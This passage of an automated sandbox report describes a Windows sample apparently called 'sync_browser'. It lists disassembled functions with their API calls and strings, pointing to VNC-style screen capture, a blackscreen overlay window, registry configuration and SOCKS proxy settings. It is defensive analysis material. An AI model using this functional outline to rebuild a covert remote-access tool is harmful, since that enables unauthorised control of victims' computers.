Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722

Part of subcall function 00007FF67E8177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817840
Part of subcall function 00007FF67E8177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81787D

Strings

UseRegistry, xrefs: 00007FF67E817F7C
locdom3, xrefs: 00007FF67E817FA6, 00007FF67E817FBF
admin, xrefs: 00007FF67E817F83

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$Create$FileModuleNameQueryValue
String ID: UseRegistry$admin$locdom3
API String ID: 1788981264-1943432916
Opcode ID: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
Instruction ID: 541dcc281353cdb77944f051c3ea216584f4846b44e471673caf9a635463d6ba
Opcode Fuzzy Hash: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
Instruction Fuzzy Hash: DF012123E3858281FA21DB74A4913B6E391EFB9304F810539F62EC65D6DE3DE54DD600

Function 00007FF67E817E10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817E50

Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722

Part of subcall function 00007FF67E8177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817840
Part of subcall function 00007FF67E8177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81787D

Strings

UseRegistry, xrefs: 00007FF67E817E3F
locdom1, xrefs: 00007FF67E817E69, 00007FF67E817E82
admin, xrefs: 00007FF67E817E46

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$Create$FileModuleNameQueryValue
String ID: UseRegistry$admin$locdom1
API String ID: 1788981264-2648182776
Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
Instruction ID: 106fcb3be87d2c9141303029cea6fa4defe9c24fe86551095871f3759d7ee463
Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
Instruction Fuzzy Hash: A4015E23B3CA4381FB21AB64E4913B5A291EF79304F800139F62EC62D6DE3DE94DC600

Function 00007FF67E817EB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817EED

Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722

Part of subcall function 00007FF67E8177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817840
Part of subcall function 00007FF67E8177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81787D

Strings

UseRegistry, xrefs: 00007FF67E817EDC
locdom2, xrefs: 00007FF67E817F06, 00007FF67E817F1F
admin, xrefs: 00007FF67E817EE3

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$Create$FileModuleNameQueryValue
String ID: UseRegistry$admin$locdom2
API String ID: 1788981264-80830018
Opcode ID: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
Instruction ID: 7296f2190cb1316bbe8d0d53725e603fa3912f6ce09aa81c92d55446813b5d1b
Opcode Fuzzy Hash: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
Instruction Fuzzy Hash: 35012123E3858281FA21DB74A4953B6A391EFB9304F810539F52EC6596DE3DE54DD600

Function 00007FF67E7F0D40 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 239windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00007FF67E7F0D8E
PtInRect.USER32 ref: 00007FF67E7F0DCC
GetIconInfo.USER32 ref: 00007FF67E7F0E05
GetSystemMetrics.USER32 ref: 00007FF67E7F0E7F
GetSystemMetrics.USER32 ref: 00007FF67E7F0E8C
SelectObject.GDI32 ref: 00007FF67E7F0F37
CreateCompatibleDC.GDI32 ref: 00007FF67E7F0F50
CreateCompatibleDC.GDI32 ref: 00007FF67E7F0F60
SelectObject.GDI32 ref: 00007FF67E7F0F70
SelectObject.GDI32 ref: 00007FF67E7F0F80
BitBlt.GDI32 ref: 00007FF67E7F0FCD
BitBlt.GDI32 ref: 00007FF67E7F1017
SelectObject.GDI32 ref: 00007FF67E7F1027
SelectObject.GDI32 ref: 00007FF67E7F1033
SelectObject.GDI32 ref: 00007FF67E7F103F
DeleteDC.GDI32 ref: 00007FF67E7F1048
DeleteDC.GDI32 ref: 00007FF67E7F1051
SelectObject.GDI32 ref: 00007FF67E7F1067
DrawIconEx.USER32 ref: 00007FF67E7F10AA
SelectObject.GDI32 ref: 00007FF67E7F10BA
DeleteObject.GDI32 ref: 00007FF67E7F10C9
DeleteObject.GDI32 ref: 00007FF67E7F10D8
GdiFlush.GDI32 ref: 00007FF67E7F10FE
DeleteObject.GDI32 ref: 00007FF67E7F11B9
DeleteObject.GDI32 ref: 00007FF67E7F11CC

Strings

F, xrefs: 00007FF67E7F0FF1

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
String ID: F
API String ID: 2202639625-1304234792
Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
Instruction ID: 42c98917a296c0dd9da8b19637784faac7e5a4158c2d37cea886507ee09738fc
Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
Instruction Fuzzy Hash: 2FC16C37A186968AE790CFA9D6489AE73BDFF58784F010436EE0993714DF7C9849CB10

Function 00007FF67E7C3F30 Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 141libraryregistryloaderCOMMON

Download Yara Rule

APIs

LoadIconA.USER32 ref: 00007FF67E7C3FA3
LoadCursorA.USER32 ref: 00007FF67E7C3FC0
GetStockObject.GDI32 ref: 00007FF67E7C3FD1
RegisterClassExA.USER32 ref: 00007FF67E7C3FFB
GetSystemMetrics.USER32 ref: 00007FF67E7C400B
GetSystemMetrics.USER32 ref: 00007FF67E7C401B
GetSystemMetrics.USER32 ref: 00007FF67E7C402B
GetSystemMetrics.USER32 ref: 00007FF67E7C4036
GetSystemMetrics.USER32 ref: 00007FF67E7C4041
GetSystemMetrics.USER32 ref: 00007FF67E7C404C
AdjustWindowRect.USER32 ref: 00007FF67E7C4088
CreateWindowExA.USER32 ref: 00007FF67E7C40D0
LoadLibraryA.KERNEL32 ref: 00007FF67E7C40E4
GetProcAddress.KERNEL32 ref: 00007FF67E7C40F9
GetWindowLongPtrA.USER32 ref: 00007FF67E7C410E
GetWindowLongPtrA.USER32 ref: 00007FF67E7C4120
SetWindowLongPtrA.USER32 ref: 00007FF67E7C413B
GetWindowLongPtrA.USER32 ref: 00007FF67E7C4152
SetWindowLongPtrA.USER32 ref: 00007FF67E7C416D
ShowWindow.USER32 ref: 00007FF67E7C417F
SetWindowPos.USER32 ref: 00007FF67E7C41BE

Strings

user32, xrefs: 00007FF67E7C40D6
blackscreen, xrefs: 00007FF67E7C3FD7
0, xrefs: 00007FF67E7C41A3
SetLayeredWindowAttributes, xrefs: 00007FF67E7C40EF
P, xrefs: 00007FF67E7C3F89

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$MetricsSystem$Long$Load$AddressAdjustClassCreateCursorIconLibraryObjectProcRectRegisterShowStock
String ID: 0$P$SetLayeredWindowAttributes$blackscreen$user32
API String ID: 1337014749-2363801694
Opcode ID: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
Instruction ID: e826080050e2f06d2d99ba6df200f405e413c10694def69dfb7cebdf489ffc40
Opcode Fuzzy Hash: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
Instruction Fuzzy Hash: C4712237A18B8286E714CF65F85476AB3A5FB98754F504139EA5E83794DF3CD049CB00

Function 00007FF67E7EEBF0 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 242sleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00007FF67E7EEC60
Sleep.KERNEL32 ref: 00007FF67E7EEC6B
SetEvent.KERNEL32 ref: 00007FF67E7EECA2
CloseHandle.KERNEL32 ref: 00007FF67E7EEE83
CloseHandle.KERNEL32 ref: 00007FF67E7EEE99
FreeLibrary.KERNEL32 ref: 00007FF67E7EEE5F

Part of subcall function 00007FF67E7F3170: PostThreadMessageA.USER32 ref: 00007FF67E7F31B6
Part of subcall function 00007FF67E7F3170: WaitForSingleObject.KERNEL32 ref: 00007FF67E7F31C8
Part of subcall function 00007FF67E7F3170: TerminateThread.KERNEL32 ref: 00007FF67E7F31F3
Part of subcall function 00007FF67E7F3170: CloseHandle.KERNEL32 ref: 00007FF67E7F3200

ReleaseDC.USER32 ref: 00007FF67E7EEED3
DeleteDC.GDI32 ref: 00007FF67E7EEEF9
DeleteObject.GDI32 ref: 00007FF67E7EEF0D
free.LIBCMT ref: 00007FF67E7EEF1A
DeleteCriticalSection.KERNEL32 ref: 00007FF67E7EEF27
DeleteCriticalSection.KERNEL32 ref: 00007FF67E7EEF35
DeleteObject.GDI32 ref: 00007FF67E7EEF93
free.LIBCMT ref: 00007FF67E7EEFA0

Strings

vncdesktop.cpp : ~vncDesktop Shutdown(), xrefs: 00007FF67E7EED38
vncdesktop.cpp : Desktop thread running, force close , xrefs: 00007FF67E7EEC83
vncdesktop.cpp : ~vncDesktop , xrefs: 00007FF67E7EEC0F
vncdesktop.cpp : ~vncDesktop m_lGridsList.clear, xrefs: 00007FF67E7EEE00
2, xrefs: 00007FF67E7EEC73
vncdesktop.cpp : delete ((RGBPixelList) , xrefs: 00007FF67E7EEDD7
vncdesktop.cpp : ~vncDesktop:: second request to close InitWindowthread, xrefs: 00007FF67E7EEEA8
vncdesktop.cpp : failed to DeleteDC hrootdc, xrefs: 00007FF67E7EEEDD

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Delete$CloseHandleObject$CriticalEventSectionThreadfree$FreeLibraryMessagePostReleaseSingleSleepTerminateWait
String ID: 2$vncdesktop.cpp : Desktop thread running, force close $vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : ~vncDesktop $vncdesktop.cpp : ~vncDesktop Shutdown()$vncdesktop.cpp : ~vncDesktop m_lGridsList.clear$vncdesktop.cpp : ~vncDesktop:: second request to close InitWindowthread
API String ID: 2560957196-1231019345
Opcode ID: 7e6fa46451579ae09ecc31f6b970175f6b68a5489a9f202c976d78238e78da90
Instruction ID: 25d50d91cf832093bc1c4d13eee249bfbfb63203e7d08fe6a9831bb62ebadf85
Opcode Fuzzy Hash: 7e6fa46451579ae09ecc31f6b970175f6b68a5489a9f202c976d78238e78da90
Instruction Fuzzy Hash: 9DB1A027A28AC285FB24DF65D8401F96365FFA4B84F444432EA0ED7AA9CF3CE549D310

Function 00007FF67E88DC9C Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DCE1
GetProcAddress.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DCFD
EncodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD0F
GetProcAddress.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD26
EncodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD2F
GetProcAddress.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD46
EncodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD4F
GetProcAddress.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD66
EncodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD6F
GetProcAddress.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD8E
EncodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD97
DecodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DDCA
DecodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DDDA
DecodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DE30
DecodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DE51
DecodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DE6B

Strings

GetActiveWindow, xrefs: 00007FF67E88DD15
USER32.DLL, xrefs: 00007FF67E88DCDA
MessageBoxW, xrefs: 00007FF67E88DCF3
GetUserObjectInformationW, xrefs: 00007FF67E88DD55
GetLastActivePopup, xrefs: 00007FF67E88DD35
GetProcessWindowStation, xrefs: 00007FF67E88DD84

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 2643518689-564504941
Opcode ID: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
Instruction ID: df6ecce0a92e4e4b4d8300b638857f5857bd6f192f7c84a0d713e0390f832102
Opcode Fuzzy Hash: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
Instruction Fuzzy Hash: 4D51B326E3AB1382FE59DB55B854675A3A8AF79B81F544135FC1E837A0EE3CB44D8300

Function 00007FF67E7D0430 Relevance: 36.2, APIs: 24, Instructions: 202COMMON

Download Yara Rule

APIs

GetRgnBox.GDI32 ref: 00007FF67E7D0473
CreateRectRgn.GDI32 ref: 00007FF67E7D04BC
CombineRgn.GDI32 ref: 00007FF67E7D04D9
OffsetRgn.GDI32 ref: 00007FF67E7D04EE
GetRgnBox.GDI32 ref: 00007FF67E7D050D
GetRgnBox.GDI32 ref: 00007FF67E7D0524
GetRgnBox.GDI32 ref: 00007FF67E7D0532
DeleteObject.GDI32 ref: 00007FF67E7D06F1
free.LIBCMT ref: 00007FF67E7D06FB
DeleteObject.GDI32 ref: 00007FF67E7D0704
free.LIBCMT ref: 00007FF67E7D070E
DeleteObject.GDI32 ref: 00007FF67E7D0716
free.LIBCMT ref: 00007FF67E7D0720

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$CombineCreateOffsetRect
String ID:
API String ID: 960235054-0
Opcode ID: 224b91042e85a85521578d17d2a23cec9d35e7843f40fe2a103922193ff0c210
Instruction ID: 644cb527c12bf738231fdeef4c2c2fcec86fe74c9e7cfdabebb69e45dd6069d8
Opcode Fuzzy Hash: 224b91042e85a85521578d17d2a23cec9d35e7843f40fe2a103922193ff0c210
Instruction Fuzzy Hash: B2917137B14A428AEB20DF66E4546ADB765FB94B88F408031EE4E97B65DF3CE509C300

Function 00007FF67E7CB550 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CB030: _wgetenv.LIBCMT ref: 00007FF67E7CB05E
Part of subcall function 00007FF67E7CB030: _wgetenv.LIBCMT ref: 00007FF67E7CB08C
Part of subcall function 00007FF67E7CB030: _wgetenv.LIBCMT ref: 00007FF67E7CB0DC
Part of subcall function 00007FF67E7CB030: inet_ntoa.WS2_32 ref: 00007FF67E7CB1C8

inet_ntoa.WS2_32 ref: 00007FF67E7CB5B8
free.LIBCMT ref: 00007FF67E7CB5D4
_wgetenv.LIBCMT ref: 00007FF67E7CB682
free.LIBCMT ref: 00007FF67E7CB5CC

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

inet_ntoa.WS2_32 ref: 00007FF67E7CB59C

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

_wgetenv.LIBCMT ref: 00007FF67E7CB60D
_wgetenv.LIBCMT ref: 00007FF67E7CB665
_wgetenv.LIBCMT ref: 00007FF67E7CB6B0
_wgetenv.LIBCMT ref: 00007FF67E7CB701
_wgetenv.LIBCMT ref: 00007FF67E7CB738
_wgetenv.LIBCMT ref: 00007FF67E7CB766
free.LIBCMT ref: 00007FF67E7CB893

Strings

SOCKS_SERVER, xrefs: 00007FF67E7CB6A9, 00007FF67E7CB6BD
SOCKS_RESOLVE, xrefs: 00007FF67E7CB75F, 00007FF67E7CB773
SOCKS5_SERVER, xrefs: 00007FF67E7CB65E, 00007FF67E7CB672
SOCKS4_SERVER, xrefs: 00007FF67E7CB67B, 00007FF67E7CB68F
SOCKS4_RESOLVE, xrefs: 00007FF67E7CB731, 00007FF67E7CB745
SOCKS5_RESOLVE, xrefs: 00007FF67E7CB6FA, 00007FF67E7CB70E
HTTP_PROXY, xrefs: 00007FF67E7CB606, 00007FF67E7CB61A
http://, xrefs: 00007FF67E7CB7BE

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
